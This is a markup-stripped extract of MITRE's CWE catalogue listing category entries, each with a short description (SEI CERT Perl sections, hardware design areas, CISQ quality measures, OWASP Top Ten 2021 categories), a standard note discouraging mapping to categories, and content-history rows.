+ + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Concurrency (CON) section of the SEI CERT Oracle Secure Coding Standard for Java. + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2019-06-20 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Input Validation and Data Sanitization (IDS) section of the SEI CERT Perl Coding Standard. + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-01-08 + 3.3 + 2019-06-20 + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Declarations and Initialization (DCL) section of the SEI CERT Perl Coding Standard. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-01-08 + 3.3 + 2019-06-20 + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Expressions (EXP) section of the SEI CERT Perl Coding Standard. + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-01-08 + 3.3 + 2019-06-20 + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Integers (INT) section of the SEI CERT Perl Coding Standard. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-01-08 + 3.3 + 2019-06-20 + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Strings (STR) section of the SEI CERT Perl Coding Standard. + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-01-08 + 3.3 + 2019-06-20 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Object-Oriented Programming (OOP) section of the SEI CERT Perl Coding Standard. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-01-08 + 3.3 + 2019-06-20 + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the File Input and Output (FIO) section of the SEI CERT Perl Coding Standard. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-01-08 + 3.3 + 2019-06-20 + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the rules and recommendations in the Miscellaneous (MSC) section of the SEI CERT Perl Coding Standard. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-01-08 + 3.3 + 2019-06-20 + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are root-caused to defects that arise in the semiconductor-manufacturing process or during the life cycle and supply chain. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-27 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to improper design of full-system security flows, including but not limited to secure boot, secure update, and hardware-device attestation. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-27 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are those that arise due to integration of multiple hardware Intellectual Property (IP) cores, from System-on-a-Chip (SoC) subsystem interactions, or from hardware platform subsystem interactions. + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-27 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to features and mechanisms providing hardware-based isolation and access control (e.g., identity, policy, locking control) of sensitive shared hardware resources such as registers and fuses. + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-27 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to hardware-circuit design and logic (e.g., CMOS transistors, finite state machines, and registers) as well as issues related to hardware description languages such as System Verilog and VHDL. + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-27 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are typically associated with CPUs, Graphics, Vision, AI, FPGA, and microcontrollers. + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-27 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are typically associated with memory (e.g., DRAM, SRAM) and storage technologies (e.g., NAND Flash, OTP, EEPROM, and eMMC). + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-27 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + + Weaknesses in this category are related to hardware + security problems that apply to peripheral devices, IO + interfaces, on-chip interconnects, network-on-chip (NoC), + and buses. For example, this category includes issues + related to design of hardware interconnect and/or protocols + such as PCIe, USB, SMBUS, general-purpose IO pins, and + user-input peripherals such as mouse and keyboard. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-27 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to hardware implementations of cryptographic protocols and other hardware-security primitives such as physical unclonable functions (PUFs) and random number generators (RNGs). + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-27 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to system power, voltage, current, temperature, clocks, system state saving/restoring, and resets at the platform and SoC level. + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-27 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Name + + + CWE Content Team + MITRE + 2023-01-31 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Power, Clock, and Reset Concerns + + + + Weaknesses in this category are related to hardware debug and test interfaces such as JTAG and scan chain. + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-27 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category can arise in multiple areas of hardware design or can apply to a wide cross-section of components. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-27 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to audit-based components of a software system. Frequently these deal with logging user activities in order to identify undesired access and modifications to the system. The weaknesses in this category could lead to a degradation of the quality of the audit capability if they are not addressed. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-30 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to authentication components of a system. Frequently these deal with the ability to verify that an entity is indeed who it claims to be. If not addressed when designing or implementing a software system, these weaknesses could lead to a degradation of the quality of the authentication capability. + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-30 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to authorization components of a system. Frequently these deal with the ability to enforce that agents have the required permissions before performing certain operations, such as modifying data. If not addressed when designing or implementing a software system, these weaknesses could lead to a degradation of the quality of the authorization capability. + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-30 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to a software system's random number generation. + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-30 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to a software system's data integrity components. Frequently these deal with the ability to ensure the integrity of data, such as messages, resource files, deployment files, and configuration files. The weaknesses in this category could lead to a degradation of data integrity quality if they are not addressed. + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-30 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to a software system's components for input validation, output validation, or other kinds of validation. Validation is a frequently-used technique for ensuring that data conforms to expectations before it is further processed as input or output. There are many varieties of validation (see CWE-20, which is just for input validation). Validation is distinct from other techniques that attempt to modify data before processing it, although developers may consider all attempts to product "safe" inputs or outputs as some kind of validation. Regardless, validation is a powerful tool that is often used to minimize malformed data from entering the system, or indirectly avoid code injection or other potentially-malicious patterns when generating output. The weaknesses in this category could lead to a degradation of the quality of data flow in a system if they are not addressed. + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE-20 (Improper Input Validation) is not included in this category because it is a Class level, and this category focuses more on Base level weaknesses. Also note that other kinds of weaknesses besides improper validation are included as members of this category. + + + + + CWE Content Team + MITRE + 2019-12-30 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Description, Name, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Input Validation Issues + + + + Weaknesses in this category are related to a software system's lockout mechanism. Frequently these deal with scenarios that take effect in case of multiple failed attempts to access a given resource. The weaknesses in this category could lead to a degradation of access to system assets if they are not addressed. + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-30 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to session management. Frequently these deal with the information or status about each user and their access rights for the duration of multiple requests. The weaknesses in this category could lead to a degradation of the quality of session management if they are not addressed. + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-30 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the handling of memory buffers within a software system. + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2019-12-30 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the handling of files within a software system. Files, directories, and folders are so central to information technology that many different weaknesses and variants have been discovered. + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2020-02-14 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the documentation provided to support, create, or analyze a product. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2020-01-07 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2022-04-28 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are associated with things being overly complex. + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2020-01-07 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to issues surrounding the bundling of data with the methods intended to operate on that data. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2020-01-07 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the use of built-in functions or external APIs. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2020-01-07 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Faulty Resource Release cluster (SFP37). + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + KDM Analytics + 2019-11-25 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Failure to Release Memory cluster (SFP38). + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + KDM Analytics + 2019-11-25 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the CISQ Quality Measures for Reliability. Presence of these weaknesses could reduce the reliability of the software. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2020-08-18 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the CISQ Quality Measures for Maintainability. Presence of these weaknesses could reduce the maintainability of the software. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2020-08-18 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the CISQ Quality Measures for Security. Presence of these weaknesses could reduce the security of the software. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2020-08-18 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the CISQ Quality Measures for Efficiency. Presence of these weaknesses could reduce the efficiency of the software. + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2020-08-18 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the creation and modification of strings. + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A01 category "Broken Access Control" in the OWASP Top Ten 2021. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses such as Pillars. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. + + + + CWE Content Team + MITRE + 2021-10-05 + 4.6 + 2021-10-28 + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A02 category "Cryptographic Failures" in the OWASP Top Ten 2021. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 